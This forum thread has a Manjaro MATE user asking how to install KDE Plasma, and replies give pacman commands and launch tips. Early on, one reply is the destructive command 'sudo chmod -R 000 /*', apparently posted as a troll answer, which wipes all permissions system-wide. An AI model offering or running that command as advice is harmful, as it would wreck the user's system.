Install KDE with a Package manager?

I have Manjaro Mate & would like to install KDE to check it out, is this possible? The one I did already will not respond. So I need to start fresh.

MSI Performance Gaming AMD Ryzen 1st and 2nd Gen AM4 M.2 USB 3 DDR4 HDMI Display Port Mini-ITX Motherboard (B450I Gaming Plus AC), AMD Ryzen 7 2700 4.1 GHz, TEAMGROUP T-Force Vulcan Z DDR4 16GB (2 x 8GB) 3200MHz (PC4 25600) Ram, EVGA GeForce RTX 3060 Ti XC Gaming, 08G-P5-3663-KL, 8GB GDDR6, Metal Backplate, LHR

yes

Don't ask to ask, just ask... please聽馃え

sudo chmod -R 000 /*

Yes, that should be fairly simple. I'm not familiar with Manjaro specifically, but looking at the docs here, it should be as simple as

`sudo pacman -Syu ${package name}`. Looking at the Arch Wiki, the package name should just be 'plasma', so try `sudo pacman -Syu plasma`.

You may also need to update your display manager to make plasma appear as an option on the login screen, but I can't help you there I'm afraid. Without updating the display manager, you should at least be able to try plasma using another tty (e.g ctrl-shift-f2), logging in on the command prompt and then running the command `/usr/lib/plasma-dbus-run-session-if-needed /usr/bin/startplasma-wayland`.

47 minutes ago, Cyber Raven said:

Yes, that should be fairly simple. I'm not familiar with Manjaro specifically, but looking at the docs here, it should be as simple as

`sudo pacman -Syu ${package name}`. Looking at the Arch Wiki, the package name should just be 'plasma', so try `sudo pacman -Syu plasma`.

You may also need to update your display manager to make plasma appear as an option on the login screen, but I can't help you there I'm afraid. Without updating the display manager, you should at least be able to try plasma using another tty (e.g ctrl-shift-f2), logging in on the command prompt and then running the command `/usr/lib/plasma-dbus-run-session-if-needed /usr/bin/startplasma-wayland`.

I did, I had it, but it was freez9ng conflicting with Mare maybe. If I can get it how I want it, I will delete Mate. Unless that will leave some mess behind.

MSI Performance Gaming AMD Ryzen 1st and 2nd Gen AM4 M.2 USB 3 DDR4 HDMI Display Port Mini-ITX Motherboard (B450I Gaming Plus AC), AMD Ryzen 7 2700 4.1 GHz, TEAMGROUP T-Force Vulcan Z DDR4 16GB (2 x 8GB) 3200MHz (PC4 25600) Ram, EVGA GeForce RTX 3060 Ti XC Gaming, 08G-P5-3663-KL, 8GB GDDR6, Metal Backplate, LHR

4 minutes ago, Edward78 said:

I did, I had it, but it was freez9ng conflicting with Mare maybe. If I can get it how I want it, I will delete Mate. Unless that will leave some mess behind.

It shouldn't have been conflicting with Mate, how were you launching it? Did you install the `plasma-desktop` base package or the `plasma` package group? If the former, try the latter, there might have been some missing packages causing the freezing.

I used the comands on the Manjaro DE install page. https://wiki.manjaro.org/index.php/Install_Desktop_Environments

Installing both DEs could be messing up your config and install, try uninstalling your current DE and install plasma then.